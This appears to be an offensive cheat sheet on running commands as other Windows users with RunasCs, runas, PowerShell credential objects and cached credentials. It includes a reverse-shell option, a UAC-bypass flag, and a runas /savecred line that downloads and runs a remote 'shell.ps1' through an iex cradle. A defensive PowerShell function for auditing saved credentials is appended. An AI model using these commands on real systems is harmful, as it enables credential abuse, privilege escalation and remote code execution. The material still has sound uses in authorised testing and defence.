TLDRBins / Runas


RunasCS

.\RunasCs.exe '<USER>' '<PASSWORD>' "<CMD>" -r <LOCAL_IP>:<LOCAL_PORT>

.\RunasCs.exe '<USER>' '<PASSWORD>' "<CMD>" -l <LOGON_TYPE>
# Or
.\RunasCs.exe '<USER>' '<PASSWORD>' --bypass-uac "<CMD>" -l <LOGON_TYPE>

LOGON TYPE
---------------------
2   Interactive
3   Network
4   Batch
5   Service
7   Unlock
8   NetworkCleartext
9   NewCredentials
10  RemoteInteractive
11  CachedInteractive

Ref: RunasCS

Runas (With Password)

runas /user:'<USER>' "<CMD>"
Sample Output: runas /user:'admin' "powershell"

Runas (With Cred Object)

1. Create Credential Object

$username = '<DOMAIN>\<USER>'
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($username, $password)

# Or
$username = '<DOMAIN>\<USER>'
$password = '<PASSWORD>'
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr

2. Run Command

# Set computer to 'localhost' if running locally
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME>
Sample Output: Invoke-Command -ScriptBlock { powershell } -Credential $cred -Computer localhost

# If error, try
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME> -auth credssp

# Invoke command with config
Invoke-Command -ScriptBlock { <CMD> } -Credential $cred -Computer <COMPUTER_NAME> -ConfigurationName <CONFIG_NAME>

# Set computer to '.' if running locally
new-pssession -computername <COMPUTER_NAME> -credential $cred
Sample Output: new-pssession -computername . -credential $cred

# Switch to new session
enter-pssession <SESSION_ID>

Runas (With Cached Creds)

1. Check Cached Creds

cmdkey /list

2. Run Command

runas /user:<DOMAIN>\<USER> /savecred "<CMD>"
Sample Output:
# e.g. Upload and run a shell
runas /user:<DOMAIN>\<USER> /savecred "powershell iex(new-object net.webclient).downloadstring('http://<LOCAL_IP>/shell.ps1')"
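
Audit side of the cached-credential steps above, as an added example that is not part of the original page: it parses `cmdkey /list` output and returns the stored entries that `runas /savecred` reuses without a password prompt. The function name `Get-SavedRunasCredential` is hypothetical, the sample text is constructed, and the parser assumes English-language `cmdkey` labels.

```powershell
function Get-SavedRunasCredential {
    param(
        # Lines of `cmdkey /list` output; defaults to querying the live system.
        [string[]]$CmdkeyOutput = (cmdkey /list)
    )

    $entries = @()
    $current = $null
    foreach ($line in $CmdkeyOutput) {
        if ($line -match '^\s*Target:\s*(.+?)\s*$') {
            # A "Target:" line starts a new stored-credential entry.
            $current = [pscustomobject]@{ Target = $Matches[1]; Type = ''; User = '' }
            $entries += $current
        }
        elseif ($current -and $line -match '^\s*(Type|User):\s*(.+?)\s*$') {
            $current.($Matches[1]) = $Matches[2]
        }
    }

    # Entries saved by `runas /savecred` appear under a "Domain:interactive=" target.
    $entries | Where-Object { $_.Target -like 'Domain:interactive=*' }
}

# Constructed sample of `cmdkey /list` output (not captured from a real host).
$sample = @'
Currently stored credentials:

    Target: Domain:interactive=CORP\svc_backup
    Type: Domain Password
    User: CORP\svc_backup

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: builder
'@ -split "`r?`n"

# Only the CORP\svc_backup entry is returned for the sample.
Get-SavedRunasCredential -CmdkeyOutput $sample | Format-Table -AutoSize

# Remove an entry that should not persist:
# cmdkey /delete:<TARGET>
```

Run it without `-CmdkeyOutput` in a user's session to check that user's live credential store; `cmdkey` only lists entries for the account it runs under.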